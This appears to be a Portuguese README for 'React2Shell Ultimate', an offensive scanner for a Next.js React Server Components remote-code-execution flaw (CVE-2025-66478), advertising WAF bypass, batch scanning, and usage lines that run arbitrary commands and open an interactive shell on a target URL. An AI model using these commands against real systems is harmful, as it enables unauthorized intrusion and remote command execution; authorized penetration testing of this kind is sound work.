
Scanner de vulnerabilidade RSC RCE do Next.js com múltiplos modos de varredura, bypass de WAF, shell interativo e varredura em lote para testes de penetração autorizados.
Scanner profissional de vulnerabilidade RCE Next.js RSC para CVE-2025-66478
React2Shell Ultimate é um scanner de vulnerabilidade abrangente para CVE-2025-66478 - uma vulnerabilidade crítica de Execução Remota de Código (RCE) que afeta aplicações Next.js que utilizam React Server Components (RSC).
A versão 2.0 traz grandes melhorias e recursos profissionais:
# Basic scan
python3 react2shell-ultimate.py -u https://target.com
# RCE mode
python3 react2shell-ultimate.py -u https://target.com --mode rce
# Execute command (God Mode)
python3 react2shell-ultimate.py -u https://target.com --exec "id"
# Interactive shell
python3 react2shell-ultimate.py -u https://target.com --shell
# Clone the repository
git clone https://github.com/hackersatyamrastogi/react2shell-ultimate.git
cd react2shell-ultimate
# Install dependencies
pip3 install -r requirements.txt
# Make the script executable
chmod +x react2shell-ultimate.py
# Verify installation
python3 react2shell-ultimate.py --version
Requisitos:
Experimente o React2Shell Ultimate através da nossa interface web profissional:
Funcionalidades Web:
APENAS PARA TESTES DE SEGURANÇA AUTORIZADOS
Esta ferramenta foi projetada para:
Você é totalmente responsável por qualquer uso indevido desta ferramenta.
Satyam Rastogi